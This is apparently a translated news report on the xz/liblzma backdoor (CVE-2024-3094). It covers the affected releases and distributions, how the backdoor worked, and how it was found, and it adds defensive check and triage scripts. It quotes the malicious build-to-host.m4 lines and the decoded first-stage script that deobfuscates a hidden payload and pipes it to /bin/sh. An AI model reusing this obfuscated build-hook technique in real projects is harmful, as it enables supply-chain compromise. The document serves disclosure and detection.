Backdoor found in the xz/liblzma library that allows access via sshd

In the XZ Utils package, which includes the liblzma library and the utilities for working with compressed data in the ".xz" format, a backdoor (CVE-2024-3094) has been identified that allows interception and modification of data processed by applications linked against the liblzma library. The main target of the backdoor is the OpenSSH server, which in some distributions is linked with the libsystemd library, which in turn uses liblzma. Linking sshd against the vulnerable library allows attackers to gain access to the SSH server without authentication.

The backdoor was present in the official releases 5.6.0 and 5.6.1, published on February 24 and March 9, which made their way into some distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current and Manjaro testing. All users of the xz 5.6.0 and 5.6.1 releases are advised to roll back to version 5.4.6 as soon as possible.

Among the factors that limit the problem, it can be noted that the version of liblzma with the backdoor did not make it into the stable releases of the major distributions, although it did affect openSUSE Tumbleweed and Fedora 40-beta. Arch Linux and Gentoo shipped the vulnerable version of xz but are not exposed to the attack, because they do not apply the systemd-notify patch to openssh that causes sshd to be linked with liblzma. The backdoor only affects x86_64 systems based on the Linux kernel and the Glibc C library.
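The two host-side conditions described above, an affected xz/liblzma release (5.6.0 or 5.6.1) and an sshd binary that is linked with liblzma, can be checked with the following script. It is an added example and is not part of the original article or of the XZ Utils project; the sample `xz --version` text is constructed for the self-check, /usr/sbin/sshd is assumed as the default sshd location, and the linkage check relies on ldd being available.

```shell
#!/bin/sh
# Added example (not from the article or from the XZ Utils project): checks a
# host for an affected xz release and for an sshd binary that links liblzma.
# /usr/sbin/sshd is an assumed default; the sample version text is constructed.

# Return 0 when the given version string is one of the two backdoored releases.
is_affected_xz_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *)           return 1 ;;
    esac
}

# Extract the version number from the first line of `xz --version` output,
# e.g. "xz (XZ Utils) 5.6.1" -> "5.6.1".
xz_version_from_output() {
    printf '%s\n' "$1" | sed -n '1s/.*[[:space:]]\([0-9][0-9.]*\).*/\1/p'
}

# Return 0 when the binary at $1 lists liblzma among its shared libraries,
# 1 when it does not, and 2 when the check cannot be made (no ldd, no binary).
sshd_links_liblzma() {
    bin="${1:-/usr/sbin/sshd}"
    command -v ldd >/dev/null 2>&1 || return 2
    [ -x "$bin" ] || return 2
    ldd "$bin" 2>/dev/null | grep -q 'liblzma'
}

# Combined verdict for this host; safe to run under `set -e`.
check_host() {
    if command -v xz >/dev/null 2>&1; then
        ver=$(xz_version_from_output "$(xz --version 2>/dev/null)")
    else
        ver="not installed"
    fi
    echo "xz version: $ver"
    if is_affected_xz_version "$ver"; then
        echo "WARNING: affected xz release; roll back to 5.4.6 as the article advises"
    fi
    rc=0
    sshd_links_liblzma /usr/sbin/sshd || rc=$?
    case "$rc" in
        0) echo "sshd links liblzma: the backdoored code path is reachable from sshd" ;;
        1) echo "sshd does not link liblzma" ;;
        *) echo "could not inspect sshd (ldd or the binary is unavailable)" ;;
    esac
}

# Constructed sample output of `xz --version` on an affected host.
SAMPLE_XZ_VERSION_OUTPUT='xz (XZ Utils) 5.6.1
liblzma 5.6.1'

check_host
```

Run it as `sh check_xz.sh`; a host where sshd does not link liblzma (as on Arch Linux or Gentoo in the article) prints "sshd does not link liblzma" even when the affected xz release is installed.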

The code that activates the backdoor was hidden in m4 macros from the build-to-host.m4 file used by the automake tools during the build. During the build, in the course of complex obfuscated operations on the archives bad-3-corrupt_lzma2.xz and good-large_compressed.lzma, which were ostensibly used to test correctness of operation, an object file containing malicious code was generated; it was linked into the liblzma library and altered the logic of some of its functions. The m4 macros that activate the backdoor were included in the release tarballs but were not in the Git repository. At the same time, the malicious test archives were present in the repository, i.e. the person who planted the backdoor had access both to the repository and to the release generation process.

When liblzma is used by an application, the malicious changes can be used to intercept or modify data, or to affect the operation of sshd. In particular, the malicious code replaced the RSA_public_decrypt function in order to bypass the sshd authentication process. The backdoor included protection against detection and did not manifest itself when the LANG and TERM environment variables were set (i.e. when the process was run in a terminal) and the LD_DEBUG and LD_PROFILE environment variables were not set; it was also activated only when the /usr/sbin/sshd executable was run. The backdoor also had a means of detecting execution in debugging environments.

Specifically, the m4/build-to-host.m4 file used:

    gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    …
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

In the first stage of the build, the grep operation located the file tests/files/bad-3-corrupt_lzma2.xz, which, when unpacked, produced the following script:

    ####Hello####
    #345U211267$^D330^W
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    eval `grep ^srcdir= config.status`
    if test -f ../../config.status;then
    eval `grep ^srcdir= ../../config.status`
    srcdir="../../$srcdir"
    fi
    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
    ####World####
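The grep pattern shown above is also a usable detection signature: a maintainer unpacking a release tarball can run the same expression over the tree to list every file whose last line is a "####xxxxx####" marker, and can look for the gl_am_configmake variable in m4/build-to-host.m4. The following triage script does both. It is an added example, not code from the article or from the XZ Utils project; the sample source tree it builds is constructed, and it assumes that the stock gnulib build-to-host.m4 does not use the name gl_am_configmake.

```shell
#!/bin/sh
# Added example (not from the article or from the XZ Utils project): tarball
# triage that reuses the marker grep from the injected build-to-host.m4 and
# looks for the injected variable name. The sample tree is constructed here;
# the assumption is that stock gnulib never defines gl_am_configmake.

# Print the path of every regular file under $1 whose last line is
# "####" + five alphanumerics + "####" (the pattern from the article).
find_marker_files() {
    grep -aErls '#{4}[[:alnum:]]{5}#{4}$' "$1" 2>/dev/null
}

# Return 0 when the given m4 file mentions gl_am_configmake.
m4_has_injected_hook() {
    grep -q 'gl_am_configmake' "$1" 2>/dev/null
}

# Build a small constructed source tree: one clean test file, one file that
# ends with the marker line, one clean m4 file and one carrying the hook.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/tests/files" "$dir/m4"
    printf 'ordinary test data\n' > "$dir/tests/files/good-1.xz"
    printf '####Hello####\nopaque payload bytes\n####World####\n' \
        > "$dir/tests/files/suspect.xz"
    printf 'gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`\n' \
        > "$dir/m4/build-to-host.m4"
    printf 'AC_DEFUN([gl_BUILD_TO_HOST], [])\n' > "$dir/m4/clean.m4"
    printf '%s\n' "$dir"
}

# Triage report for one unpacked tarball directory: prints each finding and
# returns 0 when nothing suspicious was found, 1 otherwise.
triage_tree() {
    found=0
    for f in $(find_marker_files "$1"); do
        echo "marker-terminated file: $f"
        found=1
    done
    if m4_has_injected_hook "$1/m4/build-to-host.m4"; then
        echo "injected hook present: $1/m4/build-to-host.m4"
        found=1
    fi
    [ "$found" -eq 0 ]
}

# Demonstration on the constructed tree (reports two findings, then cleans up).
demo_tree=$(make_sample_tree)
triage_tree "$demo_tree" || echo "tree $demo_tree needs review"
rm -rf "$demo_tree"
```

To triage a real tarball, unpack it and call `triage_tree /path/to/unpacked-tree`; a marker-terminated file among the test archives or the gl_am_configmake hook in m4/build-to-host.m4 is a finding, while a clean tree returns 0 and prints nothing.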

How the attackers managed to gain access to the xz project's infrastructure has not been explained precisely. It is also unknown how many users and projects were compromised through the backdoor. The alleged author of the backdoor (JiaT75 - Jia Tan), who placed the archives with the malicious code in the repository, corresponded with Fedora developers and sent pull requests to Debian concerning the move of the distributions to the xz 5.6.0 branch, and did not arouse suspicion, since he had taken part in xz development for the past two years and is the second most prolific developer by number of changes made. Besides the xz project, the alleged author of the backdoor took part in the development of the xz-java and xz-embedded packages. In addition, a few days ago Jia Tan was added to the maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was discovered after an analysis of excessive CPU consumption and of errors generated by valgrind when connecting via ssh to Debian systems. It is noteworthy that the xz 5.6.1 release also included changes prepared by the alleged author of the backdoor in response to complaints about sshd slowdowns and crashes that appeared after upgrading to the backdoored xz 5.6.0. In addition, last year Jia Tan made changes that were incompatible with the "-fsanitize=address" checking mode, which led to it being disabled in fuzz testing.

Source: opennet.ru
